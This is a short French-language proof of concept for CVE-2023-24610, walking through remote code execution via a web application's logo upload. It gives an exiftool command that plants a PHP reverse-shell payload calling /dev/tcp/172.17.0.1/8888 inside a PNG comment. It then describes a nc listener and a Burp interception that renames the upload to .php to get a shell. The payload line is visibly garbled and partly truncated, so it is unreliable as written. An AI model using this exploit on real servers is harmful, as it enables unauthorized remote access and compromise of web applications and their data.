
Ceci est une preuve de concept pour CVE-2023-24610
Ceci est une preuve de concept pour CVE-2023-24610
Nous commençons par créer un fichier polyglotte en utilisant exiftool : exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

Nous changeons le fichier en png pour qu'il passe la vérification front-end

Après cela, nous démarrons un écouteur nc sur le port 8888 pour recevoir le shell.

L'étape suivante consiste à se connecter à l'application et à cliquer sur setup

En bas de la page, nous voyons une zone de logo 'practice'. Nous pouvons télécharger un fichier en utilisant le bouton d'édition sur le côté droit

Nous cliquons sur edit puis sur browse, nous sélectionnons le fichier “.png” que nous avons créé à la première étape

Avant de cliquer sur upload, nous nous assurons d'intercepter la requête avec Burp ou un outil similaire. Nous cliquons sur upload et dans Burp nous changeons l'extension du fichier de “png” à “php”

Nous désactivons l'interception pour que notre fichier soit téléchargé et vérifions l'écouteur nc que nous avons démarré auparavant. Nous avons un reverse shell et l'IP pointe vers notre conteneur Docker.
